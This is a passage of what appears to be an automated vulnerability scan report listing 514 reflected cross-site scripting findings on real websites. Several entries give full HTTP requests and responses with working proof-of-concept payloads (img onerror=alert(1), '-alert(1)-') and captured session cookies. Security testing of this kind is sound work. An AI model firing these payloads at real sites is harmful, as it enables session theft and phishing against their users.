1.336. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]

1.337. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]

1.338. http://www.4shared.com/index.jsp [REST URL parameter 1]

1.339. http://www.4shared.com/js/index.js [REST URL parameter 1]

1.340. http://www.4shared.com/js/index.js [REST URL parameter 2]

1.341. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

1.342. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

1.343. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

1.344. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

1.345. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]

1.346. http://www.4shared.com/m/android.jsp [REST URL parameter 1]

1.347. http://www.4shared.com/m/android.jsp [REST URL parameter 2]

1.348. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]

1.349. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]

1.350. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]

1.351. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]

1.352. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]

1.353. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]

1.354. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]

1.355. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]

1.356. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]

1.357. http://www.4shared.com/premium.jsp [REST URL parameter 1]

1.358. http://www.4shared.com/press_room/ [REST URL parameter 1]

1.359. http://www.4shared.com/privacy.jsp [REST URL parameter 1]

1.360. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]

1.361. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]

1.362. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]

1.363. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]

1.364. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]

1.365. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]

1.366. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]

1.367. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]

1.368. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

1.369. http://www.4shared.com/resellers.jsp [REST URL parameter 1]

1.370. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1]

1.371. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2]

1.372. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

1.373. http://www.4shared.com/signUpBox.jsp [df parameter]

1.374. http://www.4shared.com/signup.jsp [REST URL parameter 1]

1.375. http://www.4shared.com/terms.jsp [REST URL parameter 1]

1.376. http://www.4shared.com/toolbar/ [REST URL parameter 1]

1.377. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.378. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.379. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

1.380. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

1.381. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

1.382. http://www.barracudanetworks.com/ns/privacy/ [name of an arbitrarily supplied request parameter]

1.383. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php [name of an arbitrarily supplied request parameter]

1.384. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

1.385. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

1.386. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

1.387. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

1.388. http://www.bluefountainmedia.com/blog [name of an arbitrarily supplied request parameter]

1.389. http://www.bluefountainmedia.com/blog/ [name of an arbitrarily supplied request parameter]

1.390. http://www.bluefountainmedia.com/business [name of an arbitrarily supplied request parameter]

1.391. http://www.bluefountainmedia.com/business/ [name of an arbitrarily supplied request parameter]

1.392. http://www.conduit-banners.com/drawtoolbar/ [culture parameter]

1.393. https://www.demandstudios.com/application.html [role parameter]

1.394. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

1.395. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

1.396. http://www.google.com/search [tch parameter]

1.397. http://www.intensedebate.com/js/getCommentLink.php [REST URL parameter 2]

1.398. http://www.intensedebate.com/js/getCommentLink.php [name of an arbitrarily supplied request parameter]

1.399. http://www.intensedebate.com/js/getCommentLink.php [postid parameter]

1.400. http://www.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

1.401. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter]

1.402. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter]

1.403. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter]

1.404. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter]

1.405. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter]

1.406. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter]

1.407. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter]

1.408. http://www.komonews.com/news/116650859.html [skipthumb parameter]

1.409. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter]

1.410. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter]

1.411. http://www.komonews.com/news/116694569.html [skipthumb parameter]

1.412. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter]

1.413. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter]

1.414. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter]

1.415. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter]

1.416. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter]

1.417. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter]

1.418. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter]

1.419. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter]

1.420. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter]

1.421. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter]

1.422. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter]

1.423. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter]

1.424. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter]

1.425. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter]

1.426. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter]

1.427. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter]

1.428. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter]

1.429. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter]

1.430. http://www.komonews.com/news/entertainment/116707059.html [ref parameter]

1.431. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter]

1.432. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter]

1.433. http://www.komonews.com/news/entertainment/116737029.html [ref parameter]

1.434. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter]

1.435. http://www.komonews.com/news/entertainment/116737724.html [ref parameter]

1.436. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter]

1.437. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter]

1.438. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter]

1.439. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter]

1.440. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter]

1.441. http://www.komonews.com/news/local/116703604.html [skipthumb parameter]

1.442. http://www.komonews.com/news/local/116703604.html [tab parameter]

1.443. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter]

1.444. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter]

1.445. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter]

1.446. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter]

1.447. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter]

1.448. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter]

1.449. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter]

1.450. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter]

1.451. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter]

1.452. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter]

1.453. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter]

1.454. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter]

1.455. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter]

1.456. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter]

1.457. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter]

1.458. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter]

1.459. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter]

1.460. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter]

1.461. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter]

1.462. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter]

1.463. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter]

1.464. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter]

1.465. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter]

1.466. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter]

1.467. http://www.komonews.com/news/offbeat/116708664.html [ref parameter]

1.468. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter]

1.469. http://www.komonews.com/news/offbeat/116708719.html [ref parameter]

1.470. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter]

1.471. http://www.komonews.com/news/offbeat/116749349.html [ref parameter]

1.472. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter]

1.473. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter]

1.474. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter]

1.475. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter]

1.476. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter]

1.477. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter]

1.478. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter]

1.479. http://www.komonews.com/obits/ [chid parameter]

1.480. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter]

1.481. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter]

1.482. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter]

1.483. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter]

1.484. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter]

1.485. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter]

1.486. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter]

1.487. http://www.komonews.com/younews [c parameter]

1.488. http://www.komonews.com/younews [cid parameter]

1.489. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter]

1.490. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

1.491. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

1.492. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

1.493. http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php [name of an arbitrarily supplied request parameter]

1.494. http://www.weather.gov/view/national.php [name of an arbitrarily supplied request parameter]

1.495. http://www.weather.gov/view/states.php [name of an arbitrarily supplied request parameter]

1.496. http://www.weather.gov/view/validProds.php [name of an arbitrarily supplied request parameter]

1.497. http://www.wrh.noaa.gov/sew/main.php [name of an arbitrarily supplied request parameter]

1.498. http://www2.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

1.499. http://www4.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

1.500. http://www5.jcpenney.com/jcp/X6E.aspx [CmCatId parameter]

1.501. http://www5.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

1.502. http://xsltcache.alexa.com/traffic_graph/js/g/a/3m [REST URL parameter 5]

1.503. http://ib.adnxs.com/ttj [Referer HTTP header]

1.504. http://www.4shared.com/icons/16x16/ [Referer HTTP header]

1.505. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.506. http://www.alexa.com/data/details/traffic_details [Referer HTTP header]

1.507. http://www.espnshop.com/ [Referer HTTP header]

1.508. http://www.espnshop.com/family/index.jsp [Referer HTTP header]

1.509. https://www.rei.com/ForgotPassword [Referer HTTP header]

1.510. https://www.rei.com/OrderTrackingLoginView [Referer HTTP header]

1.511. https://www.rei.com/RegistrationView [Referer HTTP header]

1.512. https://www.rei.com/YourAccountLoginView [Referer HTTP header]

1.513. http://a.collective-media.net/cmadj/manta.comp/energy_resources [cli cookie]

1.514. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. Cross-site scripting (reflected)
There are 514 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.226.75.109
Path:   /areaCodes/detail/240/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eab4"><img%20src%3da%20onerror%3dalert(1)>11b26d08f45 was submitted in the REST URL parameter 3. This input was echoed as 1eab4"><img src=a onerror=alert(1)>11b26d08f45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /areaCodes/detail/2401eab4"><img%20src%3da%20onerror%3dalert(1)>11b26d08f45/x22 HTTP/1.1
Host: 66.226.75.109
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:54:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=3b6903bdbf87953dd60f786f4943fe8b; expires=Sat, 05-Mar-2011 01:54:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 332163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Area Code Re
...[SNIP]...
<a href="/npa_nxx/view/2401eab4"><img src=a onerror=alert(1)>11b26d08f45-000">
...[SNIP]...

1.2. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 179a9'-alert(1)-'8bab3f5f0bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp179a9'-alert(1)-'8bab3f5f0bf/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 626
Date: Sat, 26 Feb 2011 00:19:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:28 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/manta.comp179a9'-alert(1)-'8bab3f5f0bf/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;
...[SNIP]...

1.3. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6850'-alert(1)-'345e4ad839d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resourcesf6850'-alert(1)-'345e4ad839d;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 626
Date: Sat, 26 Feb 2011 00:19:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:29 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/manta.comp/energy_resourcesf6850'-alert(1)-'345e4ad839d;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001
...[SNIP]...

1.4. http://a.collective-media.net/adj/manta.comp/energy_resources [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97420'-alert(1)-'8b2472a3796 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;k=waste+disposal;c=704%2B0154271761;pos=top;sz=300x250;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;dcopt=ist;tile=2;ord=9636399718001484?97420'-alert(1)-'8b2472a3796 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/manta/mads/generic.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 670
Date: Sat, 26 Feb 2011 00:19:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
=300x250;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;dcopt=ist;tile=2;net=mt;ord=9636399718001484?97420'-alert(1)-'8b2472a3796;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11c75'-alert(1)-'9ed8bcfa867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484?&11c75'-alert(1)-'9ed8bcfa867=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 630
Date: Sat, 26 Feb 2011 00:19:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:27 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484?&11c75'-alert(1)-'9ed8bcfa867=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/manta.comp/energy_resources [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e66d'-alert(1)-'827aa445761 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484?5e66d'-alert(1)-'827aa445761 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
